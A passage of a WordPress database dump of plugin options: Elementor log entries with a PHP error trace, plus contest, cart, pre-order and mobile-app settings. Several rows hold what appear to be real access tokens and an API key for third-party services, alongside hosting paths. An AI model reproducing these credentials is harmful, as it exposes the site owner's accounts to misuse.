Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-31 03:25:49\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"d9286ae1e77fc6660a2b01399b9d8bc1\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-31 03:25:49\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:63:\"Elementor/Upgrades - _v_3_8_0_fix_php8_image_custom_size Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-31 03:25:49\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:63:\"Elementor/Upgrades - _v_3_8_0_fix_php8_image_custom_size Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"f35f937191789c40efb8b0f3f792b2c0\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-31 03:25:49\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:65:\"Elementor/Upgrades - _v_3_8_0_fix_php8_image_custom_size Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-31 03:25:49\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:65:\"Elementor/Upgrades - _v_3_8_0_fix_php8_image_custom_size Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"0d309175a16e99f4081c7cda6669c24e\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-31 03:25:49\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.7.8\";s:2:\"to\";s:5:\"3.8.0\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-31 03:25:49\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.7.8\";s:2:\"to\";s:5:\"3.8.0\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"00ce2de6a5c2ae61355b668f52cb2d5d\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-11-14 04:30:47\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.8.0\";s:2:\"to\";s:5:\"3.8.1\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-11-14 04:30:47\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.8.0\";s:2:\"to\";s:5:\"3.8.1\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"206ef1e9b011e4260df22c7c96dd05cc\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-11-14 04:30:48\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-11-14 04:30:48\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"5bd56fd339a2914ce933401f2cb5db4f\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-11-14 04:30:48\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-11-14 04:30:48\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"ce67ae3a12e57cb46889e2c74bf0457d\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-11-14 04:30:48\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-11-14 04:30:48\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"96643889ee2aee9f60d7a424afa37b8c\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-11-14 04:30:48\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.8.0\";s:2:\"to\";s:5:\"3.8.1\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-11-14 04:30:48\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.8.0\";s:2:\"to\";s:5:\"3.8.1\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"4bde328a2a3ebd7bbf99d4bcb59a62fa\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-12-07 06:33:30\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.8.1\";s:2:\"to\";s:5:\"3.9.0\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-12-07 06:33:30\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.8.1\";s:2:\"to\";s:5:\"3.9.0\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"f2046b6f01638bb1f4e8bb65c96705c5\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-12-07 06:33:31\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-12-07 06:33:31\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"a89fa99af357c70d1b91554723b5c56e\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-12-07 06:33:31\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-12-07 06:33:31\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"98cc846f26f98b252922278a85810621\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-12-07 06:33:31\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-12-07 06:33:31\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"8aaaaca6ad0b06f33f221c2af4e6bdf6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-12-07 06:33:31\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.8.1\";s:2:\"to\";s:5:\"3.9.0\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-12-07 06:33:31\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.8.1\";s:2:\"to\";s:5:\"3.9.0\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"3de52e531f10c1b2a28dbb7a0961ff18\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-12-07 06:33:32\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.8.1\";s:2:\"to\";s:5:\"3.9.0\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-12-07 06:33:32\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.8.1\";s:2:\"to\";s:5:\"3.9.0\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"672617144bf13c43605b2e4eff35bf72\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0file\";s:85:\"/storage/v6964/gopalak/public_html/wp-content/plugins/elementor/modules/ai/module.php\";s:7:\"\0*\0line\";i:442;s:7:\"\0*\0date\";s:19:\"2024-06-17 02:22:10\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:1069:\"Uncaught Error: Call to a member function get_component() on null in /storage/v6964/gopalak/public_html/wp-content/plugins/elementor/modules/ai/module.php:442\nStack trace:\n#0 /storage/v6964/gopalak/public_html/wp-content/plugins/elementor/modules/ai/module.php(301): Elementor\\Modules\\Ai\\Module-&gt;get_ai_app()\n#1 /storage/v6964/gopalak/public_html/wp-content/plugins/elementor/modules/ai/module.php(182): Elementor\\Modules\\Ai\\Module-&gt;get_ai_connect_url()\n#2 /storage/v6964/gopalak/public_html/wp-includes/class-wp-hook.php(324): Elementor\\Modules\\Ai\\Module-&gt;enqueue_ai_media_library(&#039;&#039;)\n#3 /storage/v6964/gopalak/public_html/wp-includes/class-wp-hook.php(348): WP_Hook-&gt;apply_filters(&#039;&#039;, Array)\n#4 /storage/v6964/gopalak/public_html/wp-includes/plugin.php(517): WP_Hook-&gt;do_action(Array)\n#5 /storage/v6964/gopalak/public_html/wp-includes/media.php(4957): do_action(&#039;wp_enqueue_medi...&#039;)\n#6 /storage/v6964/gopalak/public_html/wp-content/plugins/th-all-in-one-woo-cart/inc/taiowc.php(142): wp_enqueue_media()\n#7 /storage/v6964/\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:11;s:14:\"\0*\0times_dates\";a:11:{i:0;s:19:\"2024-06-17 02:22:10\";i:1;s:19:\"2024-06-17 02:22:12\";i:2;s:19:\"2024-06-17 02:51:50\";i:3;s:19:\"2024-06-17 07:28:17\";i:4;s:19:\"2024-06-17 07:35:59\";i:5;s:19:\"2024-06-17 12:56:47\";i:6;s:19:\"2024-06-17 14:59:47\";i:7;s:19:\"2024-06-17 18:12:42\";i:8;s:19:\"2024-06-17 19:32:47\";i:9;s:19:\"2024-06-17 20:21:57\";i:10;s:19:\"2024-06-17 21:48:17\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:5:\"error\";s:7:\"message\";s:1024:\"Uncaught Error: Call to a member function get_component() on null in /storage/v6964/gopalak/public_html/wp-content/plugins/elementor/modules/ai/module.php:442\nStack trace:\n#0 /storage/v6964/gopalak/public_html/wp-content/plugins/elementor/modules/ai/module.php(301): Elementor\\Modules\\Ai\\Module->get_ai_app()\n#1 /storage/v6964/gopalak/public_html/wp-content/plugins/elementor/modules/ai/module.php(182): Elementor\\Modules\\Ai\\Module->get_ai_connect_url()\n#2 /storage/v6964/gopalak/public_html/wp-includes/class-wp-hook.php(324): Elementor\\Modules\\Ai\\Module->enqueue_ai_media_library(\'\')\n#3 /storage/v6964/gopalak/public_html/wp-includes/class-wp-hook.php(348): WP_Hook->apply_filters(\'\', Array)\n#4 /storage/v6964/gopalak/public_html/wp-includes/plugin.php(517): WP_Hook->do_action(Array)\n#5 /storage/v6964/gopalak/public_html/wp-includes/media.php(4957): do_action(\'wp_enqueue_medi...\')\n#6 /storage/v6964/gopalak/public_html/wp-content/plugins/th-all-in-one-woo-cart/inc/taiowc.php(142): wp_enqueue_media()\n#7 /storage/v6964/\";s:4:\"file\";s:85:\"/storage/v6964/gopalak/public_html/wp-content/plugins/elementor/modules/ai/module.php\";s:4:\"line\";i:442;s:5:\"trace\";b:1;}}}','no'),(11518,'ccc_start_date','February 4, 2022','yes'),(11519,'ccc_end_date','February 8, 2022','yes'),(11520,'ccc_display_popover','Y','yes'),(11521,'ccc_pop_up_width','830','yes'),(11522,'ccc_pop_up_height','110','yes'),(11523,'ccc_email_winner','','yes'),(11524,'ccc_email_winner_body','','yes'),(11525,'ccc_email_winner_subject','','yes'),(11526,'ccc_text_winning','aa','yes'),(11527,'ccc_text_losing','aa','yes'),(11528,'ccc_text_invalid','aaa','yes'),(11529,'ccc_text_already_used','aaaa','yes'),(11530,'ccc_contest_not_running','','yes'),(11531,'ccc_hide_email','','yes'),(11532,'ccc_hide_first_name','','yes'),(11533,'ccc_hide_last_name','','yes'),(11534,'ccc_do_not_save_invalid','','yes'),(11698,'rafflepress_initial_version','1.9.0','no'),(11699,'rafflepress_run_activation','','yes'),(11700,'rafflepress_settings','{  \n    \"api_key\":\"\",\n    \"updates\":\"none\",\n    \"updates_to\":\"\",\n    \"slug\":\"rafflepress\",\n    \"default_timezone\":\"Asia/Kolkata\"\n }','yes'),(11701,'rafflepress_token','j9o8we3ymcxvxypwna4pli6fal6lx4ia','yes'),(11705,'rafflepress_over_time','a:3:{s:17:\"installed_version\";s:5:\"1.9.0\";s:14:\"installed_date\";i:1643968332;s:13:\"installed_pro\";s:4:\"lite\";}','yes'),(11707,'rafflepress_version','1.9.0','yes'),(11709,'rafflepress_review','a:2:{s:4:\"time\";i:1643968336;s:9:\"dismissed\";b:0;}','yes'),(11710,'rafflepress_notifications','a:4:{s:6:\"update\";i:1644227566;s:4:\"feed\";a:0:{}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','yes'),(13750,'pre_order_setting_default','a:11:{s:7:\"enabled\";s:3:\"yes\";s:17:\"price_calculation\";s:3:\"yes\";s:20:\"default_label_simple\";s:13:\"Pre-Order Now\";s:12:\"no_date_text\";s:15:\"Comming Soon...\";s:9:\"date_text\";s:56:\"Available on: {availability_date} at {availability_time}\";s:14:\"label_variable\";s:14:\"Select Options\";s:15:\"color_shop_page\";s:0:\"\";s:18:\"color_stock_status\";s:0:\"\";s:17:\"color_date_single\";s:7:\"#00a79c\";s:15:\"color_date_cart\";s:7:\"#a46497\";s:20:\"color_date_shop_page\";s:7:\"#b20015\";}','yes'),(13753,'product-pre-orders-for-woo_start_use','1','yes'),(13956,'woo-cart-all-in-one_start_use','1','yes'),(14007,'woo_cart_all_in_one_params','a:6:{s:27:\"sc_pd_delete_icon_font_size\";s:2:\"15\";s:11:\"sc_position\";s:11:\"bottom_left\";s:16:\"sc_loading_color\";s:7:\"#31e200\";s:38:\"sc_header_coupon_button_bg_color_hover\";s:7:\"#81d742\";s:9:\"mc_enable\";s:1:\"1\";s:13:\"sc_icon_color\";s:7:\"#81d742\";}','yes'),(14051,'taiowc','a:108:{s:10:\"cart_style\";s:7:\"style-1\";s:17:\"fxd_cart_position\";s:9:\"fxd-right\";s:18:\"fxd_cart_frm_right\";s:0:\"\";s:17:\"fxd_cart_frm_left\";s:2:\"36\";s:16:\"fxd_cart_frm_btm\";s:0:\"\";s:11:\"cart_effect\";s:18:\"taiowc-slide-right\";s:12:\"basket_count\";s:8:\"numb_prd\";s:15:\"cart_item_order\";s:9:\"prd_first\";s:16:\"not_showing_page\";s:0:\"\";s:7:\"cart_hd\";s:0:\"\";s:14:\"empty_cart_txt\";s:0:\"\";s:14:\"empty_cart_url\";s:0:\"\";s:9:\"cart-icon\";s:6:\"icon-1\";s:9:\"cart_open\";s:11:\"simple-open\";s:12:\"show_prd_img\";s:1:\"1\";s:14:\"show_prd_title\";s:1:\"1\";s:14:\"show_prd_price\";s:1:\"1\";s:17:\"show_prd_quantity\";s:1:\"1\";s:15:\"show_prd_rating\";s:1:\"1\";s:16:\"show_rld_product\";s:1:\"1\";s:20:\"product_may_like_tle\";s:21:\"Products you may like\";s:17:\"choose_prdct_like\";s:10:\"cross-sell\";s:19:\"product_may_like_id\";s:0:\"\";s:6:\"pay_hd\";s:15:\"Payment Details\";s:9:\"sub_total\";s:9:\"Sub Total\";s:13:\"show_shipping\";s:1:\"1\";s:8:\"ship_txt\";s:8:\"Shipping\";s:13:\"show_discount\";s:1:\"1\";s:12:\"discount_txt\";s:8:\"Discount\";s:9:\"total_txt\";s:5:\"Total\";s:11:\"show_coupon\";s:1:\"1\";s:17:\"coupon_plchdr_txt\";s:21:\"Enter your Promo Code\";s:15:\"coupon_aply_txt\";s:5:\"Apply\";s:16:\"show_coupon_list\";s:1:\"1\";s:14:\"coupon_btn_txt\";s:12:\"View Coupons\";s:17:\"show_added_coupon\";s:1:\"1\";s:16:\"tpcrt_show_price\";s:1:\"1\";s:19:\"tpcrt_show_quantity\";s:1:\"1\";s:19:\"tpcrt_prc_font_size\";s:2:\"14\";s:15:\"tpcrt_icon_size\";s:2:\"32\";s:12:\"tpcrt_bg_clr\";s:4:\"#fff\";s:15:\"tpcrt_price_clr\";s:4:\"#111\";s:21:\"tpcrt_quantity_bg_clr\";s:4:\"#111\";s:18:\"tpcrt_quantity_clr\";s:4:\"#fff\";s:19:\"tpcrt_cart_icon_clr\";s:4:\"#111\";s:15:\"fxcrt_icon_size\";s:2:\"32\";s:18:\"fxcrt_icon_brd_rds\";s:2:\"32\";s:19:\"fxcrt_show_quantity\";s:1:\"1\";s:17:\"fxcrt_cart_bg_clr\";s:4:\"#fff\";s:19:\"fxcrt_cart_icon_clr\";s:4:\"#111\";s:17:\"fxcrt_qnty_bg_clr\";s:4:\"#111\";s:14:\"fxcrt_qnty_clr\";s:4:\"#fff\";s:17:\"cart_pan_icon_shw\";s:1:\"1\";s:17:\"cart_pan_icon_clr\";s:4:\"#111\";s:15:\"cart_pan_hd_clr\";s:4:\"#111\";s:16:\"cart_pan_cls_clr\";s:4:\"#111\";s:19:\"cart_pan_hdr_bg_clr\";s:4:\"#fff\";s:15:\"cart_pan_bg_clr\";s:7:\"#f3f3f3\";s:19:\"cart_pan_prd_bg_clr\";s:4:\"#fff\";s:20:\"cart_pan_prd_tle_clr\";s:4:\"#111\";s:20:\"cart_pan_prd_rat_clr\";s:7:\"#e5a632\";s:20:\"cart_pan_prd_dlt_clr\";s:7:\"#ef6238\";s:20:\"cart_pan_prd_txt_clr\";s:4:\"#111\";s:20:\"cart_pan_prd_brd_clr\";s:7:\"#ebebeb\";s:23:\"cart_pan_rltd_hd_bg_clr\";s:4:\"#fff\";s:20:\"cart_pan_rltd_hd_clr\";s:4:\"#111\";s:24:\"cart_pan_rltd_prd_bg_clr\";s:4:\"#fff\";s:25:\"cart_pan_rltd_prd_tle_clr\";s:4:\"#111\";s:25:\"cart_pan_rltd_prd_rat_clr\";s:7:\"#e5a632\";s:25:\"cart_pan_rltd_prd_prc_clr\";s:4:\"#111\";s:28:\"cart_pan_rltd_prd_add_bg_clr\";s:4:\"#111\";s:25:\"cart_pan_rltd_prd_add_clr\";s:4:\"#fff\";s:22:\"cart_pan_pay_hd_bg_clr\";s:7:\"#f3f3f3\";s:19:\"cart_pan_pay_hd_clr\";s:4:\"#111\";s:19:\"cart_pan_pay_bg_clr\";s:4:\"#fff\";s:20:\"cart_pan_pay_txt_clr\";s:4:\"#111\";s:21:\"cart_pan_pay_link_clr\";s:4:\"#111\";s:23:\"cart_pan_pay_btn_bg_clr\";s:4:\"#111\";s:20:\"cart_pan_pay_btn_clr\";s:4:\"#fff\";s:22:\"cart_coupon_box_bg_clr\";s:7:\"#f3f3f3\";s:23:\"cart_coupon_box_brd_clr\";s:7:\"#f3f3f3\";s:23:\"cart_coupon_box_txt_clr\";s:4:\"#111\";s:25:\"cart_coupon_box_submt_clr\";s:7:\"#ef6238\";s:24:\"cart_coupon_box_view_clr\";s:7:\"#03cd00\";s:23:\"cart_coupon_code_bg_clr\";s:4:\"#FFF\";s:24:\"cart_coupon_code_brd_clr\";s:20:\"rgba(129,129,129,.2)\";s:24:\"cart_coupon_code_txt_clr\";s:4:\"#111\";s:24:\"cart_coupon_code_ofr_clr\";s:7:\"#4CAF50\";s:27:\"cart_coupon_code_btn_bg_clr\";s:4:\"#111\";s:28:\"cart_coupon_code_btn_txt_clr\";s:4:\"#fff\";s:27:\"cart_coupon_code_add_bg_clr\";s:7:\"#f6f7f7\";s:28:\"cart_coupon_code_add_txt_clr\";s:4:\"#111\";s:28:\"cart_coupon_code_add_dlt_clr\";s:7:\"#ef6238\";s:19:\"cart_pan_notify_shw\";s:1:\"1\";s:18:\"success_mgs_bg_clr\";s:7:\"#4db359\";s:19:\"success_mgs_txt_clr\";s:4:\"#fff\";s:16:\"error_mgs_bg_clr\";s:7:\"#b73d3d\";s:17:\"error_mgs_txt_clr\";s:4:\"#fff\";s:16:\"_last_active_tab\";s:14:\"taiowc_general\";s:9:\"show_cart\";i:0;s:13:\"dsble_mnu_crt\";i:0;s:18:\"dsble_mnu_crt_qnty\";i:0;s:19:\"dsble_mnu_crt_price\";i:0;s:13:\"dsble_fxd_crt\";i:0;s:18:\"dsble_fxd_crt_qnty\";i:0;s:21:\"dsble_mob_rel_prd_crt\";i:0;s:14:\"dsble_mob_ship\";i:0;s:16:\"dsble_mob_coupan\";i:0;}','yes'),(14773,'giveasap_version','2.41.0','yes'),(14774,'sg_about_page_was_read','1','yes'),(14775,'giveasap_settings','a:2:{s:24:\"subscriber_email_subject\";s:42:\"You have enrolled to {{TITLE}}. Good Luck!\";s:16:\"subscriber_email\";s:190:\"Thank you for subscribing to {{TITLE}}<br/>You can check your entries at {{ENTRY_LINK}}<br/>To get more entries and have a higher chance of winning, please do share your link: {{SHARE_LINK}}\";}','yes'),(14778,'widget_giveasap_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(14811,'rewards_fuel_api_key','SK7469373037784466765479782b504a354f44794f307243302b75613045594841514772395866574a6e754c55664b726474546c394a526e6d44346d4e447079443578574d5a563877744a4b7266467236667a73306d2f7276795558576b6e662f327650745747652f557579664f4c38586539775a56664f7272645553756d4572','yes'),(15144,'sweepwidget_access_token','afyGPRyyvrLakhQzBjwgljocOBY6H4h1Ec2suoeEysVErnnz7LSAzeQGiNys7gl0','yes'),(17934,'wpc_general_settings','a:10:{s:11:\"upload_size\";i:2;s:13:\"max_num_files\";i:10;s:10:\"file_types\";a:2:{i:0;s:3:\"jpg\";i:1;s:3:\"png\";}s:12:\"payment_mode\";s:7:\"sandbox\";s:17:\"sandbox_client_id\";s:1:\" \";s:18:\"sandbox_secret_key\";s:1:\" \";s:14:\"live_client_id\";s:0:\"\";s:15:\"live_secret_key\";s:0:\"\";s:20:\"success_payment_page\";i:0;s:19:\"failed_payment_page\";i:0;}','yes'),(18262,'totalcontest_db_version','200','yes'),(18263,'widget_totalcontest_contest','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(18264,'widget_totalcontest_submission','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(18265,'widget_totalcontest_countdown','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(18268,'totalcontest_tracking','a:2:{s:7:\"screens\";a:0:{}s:8:\"features\";a:0:{}}','yes'),(18269,'totalcontest_first_usage','2022-02-08T07:12:50+00:00','yes'),(18304,'instance_uid_totalcontest','5b4691c2-8a27-4d87-84bb-eef13cbb6a5a','yes'),(18305,'totalcontest_onboarding','a:7:{s:6:\"status\";s:4:\"done\";s:5:\"email\";s:0:\"\";s:8:\"audience\";s:5:\"other\";s:5:\"usage\";s:5:\"other\";s:8:\"tracking\";s:5:\"false\";s:6:\"signup\";s:5:\"false\";s:10:\"newsletter\";s:5:\"false\";}','yes'),(18744,'themehunk_recent_import_log_file','/storage/v6964/mangomitra/public_html/wp-content/uploads/themehunk/import-08-Feb-2022-07-56-59.txt','yes'),(19198,'grconnect_register','1','yes'),(19687,'yith_wcpo_enable_pre_order','yes','yes'),(19688,'yith_wcpo_wc-completed','no','yes'),(19689,'yith_wcpo_wc-cancelled','no','yes'),(19690,'yith_wcpo_wc-refunded','no','yes'),(19691,'yith_wcpo_wc-failed','no','yes'),(19692,'yith_wcpo_default_add_to_cart_label','Pre-Order Now','yes'),(19693,'yit_plugin_fw_panel_wc_default_options_set','a:1:{s:15:\"yith_wcpo_panel\";b:1;}','yes'),(20303,'wc_pwb_notice_plugin_review','0','yes'),(20739,'submission_category_children','a:0:{}','yes'),(21735,'socialboost_register','2','yes'),(21957,'woocommerce_analytics_enabled','yes','yes'),(21960,'woocommerce_onboarding_profile','a:1:{s:9:\"completed\";b:1;}','yes'),(21963,'woocommerce_admin_version','3.1.0','yes'),(23135,'wmab_settings','s:1991:\"a:10:{s:7:\"general\";a:18:{s:7:\"enabled\";s:1:\"1\";s:17:\"live_chat_api_key\";s:0:\"\";s:27:\"cart_option_redirect_status\";s:1:\"1\";s:17:\"image_logo_hidden\";s:0:\"\";s:23:\"whatsup_chat_number_key\";s:0:\"\";s:9:\"app_fonts\";s:15:\"BaskOldFace.TTF\";s:16:\"home_page_layout\";s:1:\"1\";s:16:\"app_button_color\";s:7:\"#304ffe\";s:15:\"app_theme_color\";s:7:\"#ff9757\";s:20:\"app_background_color\";s:7:\"#f8f8f8\";s:10:\"custom_css\";s:0:\"\";s:20:\"category_image_width\";s:2:\"25\";s:21:\"category_image_height\";s:2:\"25\";s:19:\"product_image_width\";s:2:\"25\";s:20:\"product_image_height\";s:2:\"25\";s:16:\"product_new_date\";s:10:\"06/02/2022\";s:18:\"product_new_number\";s:2:\"25\";s:27:\"vss_mab_app_logo_image_path\";s:13:\"side 2-01.png\";}s:26:\"push_notification_settings\";a:8:{s:19:\"firebase_server_key\";s:13:\"3.110.242.160\";s:32:\"order_success_notification_title\";s:0:\"\";s:30:\"order_success_notification_msg\";s:0:\"\";s:31:\"order_status_notification_title\";s:0:\"\";s:29:\"order_status_notification_msg\";s:0:\"\";s:33:\"abandoned_cart_notification_title\";s:0:\"\";s:31:\"abandoned_cart_notification_msg\";s:0:\"\";s:28:\"abandoned_cart_time_interval\";s:1:\"1\";}s:12:\"slideshow_id\";s:1:\"1\";s:16:\"tab_bar_settings\";a:3:{s:24:\"tab_bar_background_color\";s:7:\"#d6ff80\";s:18:\"tab_bar_tint_color\";s:7:\"#ffebeb\";s:26:\"tab_bar_disable_icon_color\";s:7:\"#ffffff\";}s:9:\"banner_id\";s:1:\"2\";s:15:\"payment_methods\";a:6:{s:19:\"payment_method_name\";s:0:\"\";s:19:\"payment_method_code\";s:6:\"paypal\";s:19:\"payment_method_mode\";s:1:\"1\";s:9:\"client_id\";s:0:\"\";s:23:\"cod_payment_method_name\";s:0:\"\";s:23:\"cod_payment_method_code\";s:3:\"cod\";}s:8:\"featured\";a:3:{s:5:\"limit\";s:0:\"\";s:19:\"product_image_width\";s:0:\"\";s:20:\"product_image_height\";s:0:\"\";}s:8:\"specials\";a:3:{s:5:\"limit\";s:0:\"\";s:19:\"product_image_width\";s:0:\"\";s:20:\"product_image_height\";s:0:\"\";}s:11:\"bestsellers\";a:3:{s:5:\"limit\";s:0:\"\";s:19:\"product_image_width\";s:0:\"\";s:20:\"product_image